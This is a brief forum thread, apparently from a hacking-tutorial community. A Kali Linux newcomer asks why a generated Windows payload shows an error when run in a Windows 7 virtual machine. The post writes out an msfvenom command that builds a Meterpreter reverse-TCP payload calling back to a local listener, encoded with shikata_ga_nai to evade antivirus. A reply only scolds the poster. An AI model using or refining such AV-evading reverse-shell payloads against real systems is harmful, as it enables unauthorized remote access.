Forum Thread: Ok I Am New in the World of Kali Linux and Create a payload.exe Wirh Follow Command Msfvenom -P Windows/Meterpreter/reve

and not run, any help?

payload exe not run MS-DOS error

2 Responses

same mistake again! sorry about that, half post deleted and i want some info if i want to post and start to write in first lines write the post or headlines? must be the headlines sorry ...this is the rest post Msfvenom -P Windows/Meterpreter/reversetcp LHOST=192.168.2.2 LPORT=4444 -a x86 --Platform Windows -E x86/shikataganai -I 20 -O /Root/test.exe to Bypass on Av to Not Detect and I Success, but if I Try to Run in Windows 7 Virtual Box Show Me a Error Message

Okay well for one, please actually write in the article not the section. Also, did you look it up? Because Null Byte is not your personal army of hackers to help you.

Share Your Thoughts

  • Hot
  • Active